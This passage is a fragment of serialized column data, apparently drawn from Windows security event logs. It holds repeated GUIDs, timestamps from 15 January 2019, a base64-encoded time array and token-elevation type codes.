-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\"],\"TimeCreatedUtc\":[\"2019-01-15 05:24:24.010\",\"2019-01-15 05:24:24.023\",\"2019-01-15 05:24:25.807\",\"2019-01-15 05:24:26.010\",\"2019-01-15 05:07:26.003\",\"2019-01-15 05:08:24.013\",\"2019-01-15 05:08:24.030\",\"2019-01-15 05:08:25.717\",\"2019-01-15 05:08:26.007\",\"2019-01-15 05:09:26.010\",\"2019-01-15 05:10:24.000\",\"2019-01-15 05:10:24.047\",\"2019-01-15 05:10:25.653\",\"2019-01-15 05:10:26.000\",\"2019-01-15 05:20:24.000\",\"2019-01-15 05:20:24.017\",\"2019-01-15 05:20:25.337\",\"2019-01-15 05:20:26.017\",\"2019-01-15 05:21:26.003\",\"2019-01-15 05:17:26.000\",\"2019-01-15 05:18:24.010\",\"2019-01-15 05:18:24.027\",\"2019-01-15 05:18:25.407\",\"2019-01-15 05:18:26.010\",\"2019-01-15 05:19:26.000\",\"2019-01-15 04:47:26.000\",\"2019-01-15 04:48:24.013\",\"2019-01-15 04:48:24.030\",\"2019-01-15 04:48:25.743\",\"2019-01-15 04:48:26.017\",\"2019-01-15 04:39:26.000\",\"2019-01-15 04:40:24.013\",\"2019-01-15 04:40:24.027\",\"2019-01-15 04:40:25.393\",\"2019-01-15 04:40:26.000\",\"2019-01-15 04:37:26.007\",\"2019-01-15 04:38:24.000\",\"2019-01-15 04:38:24.020\",\"2019-01-15 04:38:25.453\",\"2019-01-15 04:38:26.017\",\"2019-01-15 04:17:26.000\",\"2019-01-15 04:18:24.003\",\"2019-01-15 04:18:24.020\",\"2019-01-15 04:18:25.490\",\"2019-01-15 04:18:26.010\",\"2019-01-15 05:13:26.007\",\"2019-01-15 05:15:16.167\",\"2019-01-15 05:15:16.277\",\"2019-01-15 05:15:16.340\",\"2019-01-15 05:15:16.353\",\"2019-01-15 05:15:16.400\",\"2019-01-15 05:15:16.430\",\"2019-01-15 05:15:16.447\",\"2019-01-15 05:15:16.500\",\"2019-01-15 05:15:16.510\",\"2019-01-15 05:15:16.520\",\"2019-01-15 05:15:16.563\",\"2019-01-15 05:15:16.613\",\"2019-01-15 05:15:16.663\",\"2019-01-15 05:15:16.677\",\"2019-01-15 05:15:16.720\",\"2019-01-15 05:15:16.767\",\"2019-01-15 05:15:16.807\",\"2019-01-15 05:15:16.850\",\"2019-01-15 05:15:16.893\",\"2019-01-15 05:15:16.967\",\"2019-01-15 05:15:17.020\",\"2019-01-15 05:15:17.077\",\"2019-01-15 05:15:17.127\",\"2019-01-15 05:15:17.137\",\"2019-01-15 05:14:24.003\",\"2019-01-15 05:14:24.023\",\"2019-01-15 05:14:25.517\",\"2019-01-15 05:14:26.013\",\"2019-01-15 05:15:03.017\",\"2019-01-15 05:15:03.047\",\"2019-01-15 05:15:03.057\",\"2019-01-15 05:15:03.247\",\"2019-01-15 05:15:03.257\",\"2019-01-15 05:15:03.390\",\"2019-01-15 05:15:03.410\",\"2019-01-15 05:15:03.503\",\"2019-01-15 05:15:03.517\",\"2019-01-15 05:15:03.543\",\"2019-01-15 05:15:03.550\",\"2019-01-15 05:15:03.830\",\"2019-01-15 05:15:03.850\",\"2019-01-15 05:15:04.507\",\"2019-01-15 05:15:05.193\",\"2019-01-15 05:15:08.723\",\"2019-01-15 05:15:10.667\",\"2019-01-15 05:15:10.683\",\"2019-01-15 05:15:10.707\",\"2019-01-15 05:15:10.730\",\"2019-01-15 05:15:10.753\",\"2019-01-15 05:15:10.817\",\"2019-01-15 05:15:11.190\",\"2019-01-15 05:15:11.260\",\"2019-01-15 05:15:11.347\",\"2019-01-15 05:15:11.413\",\"2019-01-15 05:15:11.493\",\"2019-01-15 05:15:11.537\",\"2019-01-15 05:15:11.617\",\"2019-01-15 05:15:12.930\",\"2019-01-15 05:15:12.977\",\"2019-01-15 05:15:13.053\",\"2019-01-15 05:15:13.100\",\"2019-01-15 05:15:13.173\",\"2019-01-15 05:15:13.220\",\"2019-01-15 05:15:13.287\",\"2019-01-15 05:15:13.337\",\"2019-01-15 05:15:13.407\",\"2019-01-15 05:15:13.453\",\"2019-01-15 05:15:13.517\",\"2019-01-15 05:15:13.567\",\"2019-01-15 05:15:13.633\",\"2019-01-15 05:15:13.683\",\"2019-01-15 05:15:13.747\",\"2019-01-15 05:15:13.793\",\"2019-01-15 05:15:13.867\",\"2019-01-15 05:15:11.767\",\"2019-01-15 05:15:11.833\",\"2019-01-15 05:15:11.947\",\"2019-01-15 05:15:12.003\",\"2019-01-15 05:15:12.067\",\"2019-01-15 05:15:12.123\",\"2019-01-15 05:15:12.160\",\"2019-01-15 05:15:12.167\",\"2019-01-15 05:15:12.167\",\"2019-01-15 05:15:12.337\",\"2019-01-15 05:15:12.393\",\"2019-01-15 05:15:12.460\",\"2019-01-15 05:15:12.513\",\"2019-01-15 04:35:15.673\",\"2019-01-15 04:35:16.060\",\"2019-01-15 04:35:26.010\",\"2019-01-15 05:15:12.610\",\"2019-01-15 05:15:12.670\",\"2019-01-15 05:15:12.740\",\"2019-01-15 05:15:12.847\",\"2019-01-15 05:15:15.160\",\"2019-01-15 05:15:15.183\",\"2019-01-15 05:15:15.233\",\"2019-01-15 05:15:15.283\",\"2019-01-15 05:15:15.317\",\"2019-01-15 05:15:15.440\",\"2019-01-15 05:15:15.457\",\"2019-01-15 05:15:15.483\",\"2019-01-15 05:15:15.500\",\"2019-01-15 05:15:15.520\",\"2019-01-15 05:15:15.533\",\"2019-01-15 05:15:15.553\",\"2019-01-15 05:15:15.570\",\"2019-01-15 05:15:15.620\",\"2019-01-15 05:15:15.677\",\"2019-01-15 05:15:15.727\",\"2019-01-15 05:15:15.777\",\"2019-01-15 05:15:15.827\",\"2019-01-15 05:15:15.880\",\"2019-01-15 05:15:15.923\",\"2019-01-15 05:15:15.950\",\"2019-01-15 05:15:15.967\",\"2019-01-15 05:15:16.020\",\"2019-01-15 05:15:16.067\",\"2019-01-15 05:15:16.117\",\"2019-01-15 05:15:17.217\",\"2019-01-15 05:15:17.220\",\"2019-01-15 05:15:17.257\",\"2019-01-15 05:15:17.363\",\"2019-01-15 05:15:17.410\",\"2019-01-15 05:15:17.457\",\"2019-01-15 05:15:17.493\",\"2019-01-15 05:15:17.520\",\"2019-01-15 05:15:17.570\",\"2019-01-15 05:15:17.580\",\"2019-01-15 05:15:17.650\",\"2019-01-15 05:15:18.080\",\"2019-01-15 05:15:18.147\",\"2019-01-15 05:15:18.230\",\"2019-01-15 04:36:24.010\",\"2019-01-15 04:36:24.027\",\"2019-01-15 04:36:25.517\",\"2019-01-15 04:36:26.000\",\"2019-01-15 04:49:26.010\",\"2019-01-15 04:50:24.000\",\"2019-01-15 04:50:24.017\",\"2019-01-15 04:50:25.693\",\"2019-01-15 04:50:26.010\",\"2019-01-15 04:33:26.003\",\"2019-01-15 04:33:32.463\",\"2019-01-15 05:15:18.287\",\"2019-01-15 05:15:18.300\",\"2019-01-15 05:15:18.320\",\"2019-01-15 05:15:18.337\",\"2019-01-15 05:15:18.403\",\"2019-01-15 05:15:18.450\",\"2019-01-15 05:15:18.500\",\"2019-01-15 05:15:18.547\",\"2019-01-15 05:15:18.553\",\"2019-01-15 05:15:18.630\",\"2019-01-15 05:15:18.670\",\"2019-01-15 05:15:18.707\",\"2019-01-15 05:15:18.770\",\"2019-01-15 05:15:18.820\",\"2019-01-15 05:15:18.867\",\"2019-01-15 05:15:18.917\",\"2019-01-15 05:15:18.967\",\"2019-01-15 05:15:19.010\",\"2019-01-15 05:15:19.060\",\"2019-01-15 05:15:19.127\",\"2019-01-15 05:15:19.180\",\"2019-01-15 05:15:19.223\",\"2019-01-15 05:15:19.337\",\"2019-01-15 05:15:19.403\",\"2019-01-15 05:15:19.447\",\"2019-01-15 05:15:19.490\",\"2019-01-15 05:15:19.537\",\"2019-01-15 05:15:19.583\",\"2019-01-15 05:15:19.617\",\"2019-01-15 05:15:20.623\",\"2019-01-15 05:15:26.013\",\"2019-01-15 05:15:14.033\",\"2019-01-15 05:15:14.100\",\"2019-01-15 05:15:14.157\",\"2019-01-15 05:15:14.227\",\"2019-01-15 05:15:14.293\",\"2019-01-15 05:15:14.377\",\"2019-01-15 05:15:14.453\",\"2019-01-15 05:15:14.453\",\"2019-01-15 05:15:14.490\",\"2019-01-15 05:15:14.493\",\"2019-01-15 05:15:14.563\",\"2019-01-15 05:15:14.613\",\"2019-01-15 05:15:14.640\",\"2019-01-15 05:15:14.693\",\"2019-01-15 05:15:14.770\",\"2019-01-15 05:05:26.000\",\"2019-01-15 05:06:24.000\",\"2019-01-15 05:06:24.043\",\"2019-01-15 05:06:25.770\",\"2019-01-15 05:06:26.000\",\"2019-01-15 04:34:24.010\",\"2019-01-15 04:34:24.030\",\"2019-01-15 04:34:25.583\",\"2019-01-15 04:34:26.000\",\"2019-01-15 04:25:26.000\",\"2019-01-15 04:26:24.000\",\"2019-01-15 04:26:24.017\",\"2019-01-15 04:26:25.833\",\"2019-01-15 04:26:26.007\",\"2019-01-15 04:41:26.000\",\"2019-01-15 04:42:24.000\",\"2019-01-15 04:42:24.017\",\"2019-01-15 04:42:25.387\",\"2019-01-15 04:42:25.437\",\"2019-01-15 04:42:26.007\",\"2019-01-15 04:43:05.240\",\"2019-01-15 04:43:05.253\",\"2019-01-15 04:43:26.000\",\"2019-01-15 04:19:26.000\",\"2019-01-15 04:20:24.000\",\"2019-01-15 04:20:24.017\",\"2019-01-15 04:20:25.423\",\"2019-01-15 04:20:26.007\",\"2019-01-15 04:31:26.000\",\"2019-01-15 04:32:24.010\",\"2019-01-15 04:32:24.027\",\"2019-01-15 04:32:25.650\",\"2019-01-15 04:32:26.000\",\"2019-01-15 04:27:26.000\",\"2019-01-15 04:28:01.517\",\"2019-01-15 04:28:24.003\",\"2019-01-15 04:28:24.020\",\"2019-01-15 04:28:25.770\",\"2019-01-15 04:28:26.013\",\"2019-01-15 04:28:33.090\",\"2019-01-15 05:11:26.000\",\"2019-01-15 05:12:24.007\",\"2019-01-15 05:12:24.023\",\"2019-01-15 05:12:25.403\",\"2019-01-15 05:12:25.590\",\"2019-01-15 05:12:26.003\",\"2019-01-15 04:29:26.010\",\"2019-01-15 04:30:24.007\",\"2019-01-15 04:30:24.023\",\"2019-01-15 04:30:25.710\",\"2019-01-15 04:30:26.000\",\"2019-01-15 05:16:24.003\",\"2019-01-15 05:16:24.020\",\"2019-01-15 05:16:25.453\",\"2019-01-15 05:16:26.007\",\"2019-01-15 04:23:26.000\",\"2019-01-15 04:23:43.103\",\"2019-01-15 04:24:24.000\",\"2019-01-15 04:24:24.017\",\"2019-01-15 04:24:25.307\",\"2019-01-15 04:24:26.000\",\"2019-01-15 04:44:24.000\",\"2019-01-15 04:44:24.017\",\"2019-01-15 04:44:25.867\",\"2019-01-15 04:44:26.007\",\"2019-01-15 04:44:37.180\",\"2019-01-15 04:44:37.193\",\"2019-01-15 04:21:26.000\",\"2019-01-15 04:22:24.017\",\"2019-01-15 04:22:24.030\",\"2019-01-15 04:22:25.360\",\"2019-01-15 04:22:26.010\",\"2019-01-15 04:15:26.000\",\"2019-01-15 04:16:24.007\",\"2019-01-15 04:16:24.027\",\"2019-01-15 04:16:25.550\",\"2019-01-15 04:16:26.000\",\"2019-01-15 05:22:24.007\",\"2019-01-15 05:22:24.023\",\"2019-01-15 05:22:25.863\",\"2019-01-15 05:22:26.007\",\"2019-01-15 05:23:26.000\",\"2019-01-15 04:51:26.000\",\"2019-01-15 04:52:24.000\",\"2019-01-15 04:52:24.020\",\"2019-01-15 04:52:25.613\",\"2019-01-15 04:52:26.013\",\"2019-01-15 04:59:26.017\",\"2019-01-15 05:00:24.003\",\"2019-01-15 05:00:24.017\",\"2019-01-15 05:00:25.363\",\"2019-01-15 05:00:26.000\",\"2019-01-15 05:03:26.000\",\"2019-01-15 05:04:24.000\",\"2019-01-15 05:04:24.020\",\"2019-01-15 05:04:25.837\",\"2019-01-15 05:04:26.007\",\"2019-01-15 05:01:26.007\",\"2019-01-15 05:01:52.640\",\"2019-01-15 05:02:24.000\",\"2019-01-15 05:02:24.027\",\"2019-01-15 05:02:25.293\",\"2019-01-15 05:02:26.003\",\"2019-01-15 05:02:28.260\",\"2019-01-15 05:02:28.270\",\"2019-01-15 04:55:26.000\",\"2019-01-15 04:56:24.003\",\"2019-01-15 04:56:24.020\",\"2019-01-15 04:56:25.490\",\"2019-01-15 04:56:26.000\",\"2019-01-15 04:53:26.000\",\"2019-01-15 04:54:24.003\",\"2019-01-15 04:54:24.020\",\"2019-01-15 04:54:25.557\",\"2019-01-15 04:54:26.007\",\"2019-01-15 04:57:26.000\",\"2019-01-15 04:58:24.013\",\"2019-01-15 04:58:24.030\",\"2019-01-15 04:58:25.427\",\"2019-01-15 04:58:26.010\",\"2019-01-15 04:45:24.523\",\"2019-01-15 04:45:26.007\",\"2019-01-15 04:45:28.157\",\"2019-01-15 04:46:24.017\",\"2019-01-15 04:46:24.033\",\"2019-01-15 04:46:25.800\",\"2019-01-15 04:46:26.007\"],\"TimeGenerated\":{\"__ndarray__\":\"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\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[363]},\"TokenElevationType\":[\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\